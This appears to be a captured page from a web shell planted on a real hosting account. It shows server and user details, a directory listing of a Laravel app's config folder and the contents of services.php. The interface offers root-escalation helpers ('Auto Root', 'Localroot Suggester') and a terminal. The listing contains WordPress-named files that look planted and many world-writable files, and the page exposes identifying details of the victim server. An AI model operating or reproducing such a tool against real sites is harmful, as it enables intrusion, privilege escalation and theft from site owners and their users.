Linux premium61.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
Server IP : 185.61.154.53 & Your IP : 216.73.216.73
Domains :
Cant Read [ /etc/named.conf ]
User : vdeshvpx
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
vdeshvpx /
adminapi.linkcrow.com /
config /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
197
B
-r--r--r--
2026-04-08 06:51
app.php
9.12
KB
-rwxrwxrwx
2024-11-02 06:21
auth.php
3.83
KB
-rwxrwxrwx
2024-06-30 18:36
broadcasting.php
1.62
KB
-rwxrwxrwx
2024-06-30 18:36
cache.php
3.13
KB
-rwxrwxrwx
2024-06-30 18:36
cors.php
877
B
-rwxrwxrwx
2024-08-05 09:59
current.php
22
B
-rw-r--r--
2026-04-01 01:39
database.php
5.08
KB
-rwxrwxrwx
2024-06-30 18:36
dompdf.php
11.21
KB
-rwxrwxrwx
2024-11-02 06:21
error_log
12.15
KB
-rw-r--r--
2026-02-09 00:56
filesystems.php
2.71
KB
-rwxrwxrwx
2024-06-30 18:36
hashing.php
1.58
KB
-rwxrwxrwx
2024-06-30 18:36
logging.php
2.93
KB
-rwxrwxrwx
2024-06-30 18:36
mail.php
3.4
KB
-rwxrwxrwx
2024-06-30 18:36
permission.php
6.54
KB
-rwxrwxrwx
2024-06-30 18:36
queue.php
2.79
KB
-rwxrwxrwx
2024-06-30 18:36
sanctum.php
2.31
KB
-rwxrwxrwx
2024-06-30 18:36
services.php
981
B
-rwxrwxrwx
2024-06-30 18:36
session.php
7.07
KB
-rwxrwxrwx
2024-06-30 18:36
view.php
1.06
KB
-rwxrwxrwx
2024-06-30 18:36
wp-blog-header.php
2.74
KB
-rw-r--r--
2026-04-08 06:50
wp-cron.php
2.74
KB
-rw-r--r--
2026-04-08 06:50
Save
Rename
<?php return [ /* |-------------------------------------------------------------------------- | Third Party Services |-------------------------------------------------------------------------- | | This file is for storing the credentials for third party services such | as Mailgun, Postmark, AWS and more. This file provides the de facto | location for this type of information, allowing packages to have | a conventional file to locate the various service credentials. | */ 'mailgun' => [ 'domain' => env('MAILGUN_DOMAIN'), 'secret' => env('MAILGUN_SECRET'), 'endpoint' => env('MAILGUN_ENDPOINT', 'api.mailgun.net'), ], 'postmark' => [ 'token' => env('POSTMARK_TOKEN'), ], 'ses' => [ 'key' => env('AWS_ACCESS_KEY_ID'), 'secret' => env('AWS_SECRET_ACCESS_KEY'), 'region' => env('AWS_DEFAULT_REGION', 'us-east-1'), ], ];